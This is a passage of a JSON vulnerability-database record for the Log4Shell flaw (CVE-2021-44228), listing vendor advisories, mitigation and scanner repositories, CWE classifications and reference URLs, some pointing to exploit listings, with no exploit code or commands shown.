{
"title": "Debian CVElist Bug Report Logs: apache-log4j2: CVE-2021-45046: Incomplete fix for CVE-2021-44228 in certain non-default configurations",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=b88a8ce4fc53c3a45830bc6bbde8b01c"
},
{
"title": "Debian Security Advisories: DSA-5020-1 apache-log4j2 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=24c79c59809a2c5bcddc81889b23a6bc"
},
{
"title": "Debian Security Advisories: DSA-5022-1 apache-log4j2 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=5ba53229ef5f408ed29126bd4f624def"
},
{
"title": "IBM: Security Bulletin: There is vulnerability in Apache Log4j used by Content Manager OnDemand z/OS. Content Manager OnDemand z/OS has addressed the applicable CVE [CVE-2021-44228]",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=dbdfcf9d51b60adf542d500e515b9ba8"
},
{
"title": "Red Hat: CVE-2021-44228",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-44228"
},
{
"title": "IBM: An update on the Apache Log4j 2.x vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=0648a3f00f067d373b069c4f2acd5db4"
},
{
"title": "Amazon Linux AMI: ALAS-2021-1553",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2021-1553"
},
{
"title": "IBM: Security Bulletin: IBM Cloud Pak System is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-45046, CVE-2021-44228)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c8b40ff47e1d31bee8b0fbdbdd4fe212"
},
{
"title": "IBM: Security Bulletin: IBM Cloud Pak System is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-45046, CVE-2021-44228)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=654a4f5a7bd1fdfd229558535923710b"
},
{
"title": "Amazon Linux 2: ALAS2-2021-1731",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1731"
},
{
"title": "Amazon Linux 2: ALAS2-2021-1730",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1730"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-44228 log"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/canarieids/Zeek-Ubuntu-22.04 "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/f5devcentral/f5-professional-services "
},
{
"title": "Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet",
"trust": 0.1,
"url": "https://github.com/thedevappsecguy/Log4J-CVE-2021-44228-Mitigation-Cheat-Sheet "
},
{
"title": "spring-on-k8s",
"trust": 0.1,
"url": "https://github.com/AndriyKalashnykov/spring-on-k8s "
},
{
"title": "jaygooby",
"trust": 0.1,
"url": "https://github.com/jaygooby/jaygooby "
},
{
"title": "log4j-log4shell-playground",
"trust": 0.1,
"url": "https://github.com/rgl/log4j-log4shell-playground "
},
{
"title": "Log4j",
"trust": 0.1,
"url": "https://github.com/kaganoglu/Log4j "
},
{
"title": "trivy-cve-scan",
"trust": 0.1,
"url": "https://github.com/broadinstitute/trivy-cve-scan "
},
{
"title": "test-44228",
"trust": 0.1,
"url": "https://github.com/datadavev/test-44228 "
},
{
"title": "cve-2021-44228-helpers",
"trust": 0.1,
"url": "https://github.com/uint0/cve-2021-44228-helpers "
},
{
"title": "log4j-vendor-list",
"trust": 0.1,
"url": "https://github.com/bizzarecontacts/log4j-vendor-list "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Live-Hack-CVE/CVE-2021-44228 "
},
{
"title": "log4shell",
"trust": 0.1,
"url": "https://github.com/0xsyr0/log4shell "
},
{
"title": "cve-2021-44228-qingteng-online-patch",
"trust": 0.1,
"url": "https://github.com/qingtengyun/cve-2021-44228-qingteng-online-patch "
},
{
"title": "cve-2021-44228",
"trust": 0.1,
"url": "https://github.com/corelight/cve-2021-44228 "
},
{
"title": "Log4Shell-IOCs",
"trust": 0.1,
"url": "https://github.com/curated-intel/Log4Shell-IOCs "
},
{
"title": "Sitecore.Solr-log4j-mitigation",
"trust": 0.1,
"url": "https://github.com/avwolferen/Sitecore.Solr-log4j-mitigation "
},
{
"title": "check-log4j",
"trust": 0.1,
"url": "https://github.com/yahoo/check-log4j "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-44228"
},
{
"db": "CNNVD",
"id": "CNNVD-202112-799"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.1
},
{
"problemtype": "CWE-400",
"trust": 1.1
},
{
"problemtype": "CWE-502",
"trust": 1.1
},
{
"problemtype": "CWE-917",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-407408"
},
{
"db": "NVD",
"id": "CVE-2021-44228"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.3,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-log4j-qruknebd"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/167917/mobileiron-log4shell-remote-command-execution.html"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/165225/apache-log4j2-2.14.1-remote-code-execution.html"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/165311/log4j-scan-extensive-scanner.html"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/165371/vmware-security-advisory-2021-0028.4.html"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/165532/log4shell-http-header-injection.html"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/165642/vmware-vcenter-server-unauthenticated-log4shell-jndi-injection-remote-code-execution.html"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/165673/unifi-network-application-unauthenticated-log4shell-remote-code-execution.html"
},
{
"trust": 1.7,
"url": "https://www.kb.cert.org/vuls/id/930724"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"
},
{
"trust": 1.7,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"
},
{
"trust": 1.7,
"url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2021-0032"
},
{
"trust": 1.7,
"url": "https://security.netapp.com/advisory/ntap-20211210-0007/"
},
{
"trust": 1.7,
"url": "https://support.apple.com/kb/ht213189"
},
{
"trust": 1.7,
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2021/dsa-5020"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/mar/23"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/jul/11"
},
{
"trust": 1.7,
"url": "http://seclists.org/fulldisclosure/2022/dec/2"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/167794/open-xchange-app-suite-7.10.x-cross-site-scripting-command-injection.html"
},
{
"trust": 1.7,
"url": "https://github.com/nu11secur1ty/cve-mitre/tree/main/cve-2021-44228"
},
{
"trust": 1.7,
"url": "https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/165260/vmware-security-advisory-2021-0028.html"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/165261/apache-log4j2-2.14.1-information-disclosure.html"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/165270/apache-log4j2-2.14.1-remote-code-execution.html"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/165281/log4j2-log4shell-regexes.html"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/165282/log4j-payload-generator.html"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/165306/l4sh-log4j-remote-code-execution.html"
},
{
"trust": 1.7,
"url": "http://packetstormsecurity.com/files/165307/log4j-remote-code-execution-word-bypassing.html"
},
{
"trust": 1.7,
"url": "https://github.com/cisagov/log4j-affected-db/blob/develop/software-list.md"
},
{
"trust": 1.7,
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"trust": 1.7,
"url": "https://twitter.com/kurtseifried/status/1469345530182455296"
},
{
"trust": 1.7,
"url": "https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.7,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/1"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/2"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/12/10/3"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/1"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/12/13/2"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/12/15/3"
},
{
"trust": 1.7,
"url": "https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/171626/ad-manager-plus-7122-remote-code-execution.html"
},
{
"trust": 1.5,
"url": "https://access.redhat.com/security/cve/cve-2021-44228"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44228"
},
{
"trust": 1.1,
"url": "https://github.com/cisagov/log4j-affected-db"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/m5csvunv4hwzzxgoknsk6l7rpm7bokib/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/vu57ujdcfiasio35gc55jmksrxjmcdfm/"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
},
{
"trust": 0.9,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.9,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.9,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/m5csvunv4hwzzxgoknsk6l7rpm7bokib/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/vu57ujdcfiasio35gc55jmksrxjmcdfm/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022010908"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060808"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022010629"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072076"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165733/red-hat-security-advisory-2022-0296-03.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6527216"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4186.4"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4316"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0080"
},
{
"trust": 0.6,
"url": "https://msrc.microsoft.com/update-guide/vulnerability/cve-2021-44228"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6528268"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122212"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022012732"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021121201"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4302.3"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/50592"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2022080025"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022011042"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021121720"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122018"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0237"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122811"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2022010065"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122401"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022011732"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022021807"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165324/ubuntu-security-notice-usn-5197-1.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021123016"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021121350"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4211"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122122"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022062001"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122403"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122721"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022010522"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022010322"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2022120027"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6525816"
},
{
"trust": 0.6,
"url": "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20211215-01-log4j-cn"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-357-02"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021122907"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060708"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/51183"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022021428"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166313/apple-security-advisory-2022-03-14-7.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6526220"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/apache-log4j-code-execution-via-jndi-remote-class-injection-37049"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4269"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213189"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022012439"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022020607"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4256.2"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022071316"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022032006"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0332"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022030923"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1188"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0492"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6526754"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021120069"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0090"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4236"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021121652"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6527330"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4198"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021121492"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4187.6"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022031501"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165279/ubuntu-security-notice-usn-5192-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/165348/ubuntu-security-notice-usn-5192-2.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4274"
},
{
"trust": 0.6,
"url": "https://support.lenovo.com/us/en/product_security/len-76573"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022012045"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021121535"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022010421"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0247"
},
{
"trust": 0.6,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-22-034-01"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-43527"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35524"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35522"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-37136"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3712"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35523"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-37137"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-21409"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.3,
"url": "https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.3,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36330"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-35521"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-20317"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-43267"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36331"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2021-45046"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45046"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.streams\u0026version=1.8.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5138"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5128"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5127"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5129"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5126"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_integration/2021.q4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=red.hat.integration\u0026version"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=jboss.amq.streams\u0026version=1.6.5"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5133"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#low"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:5140"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=appplatform\u0026version=7.4"
},
{
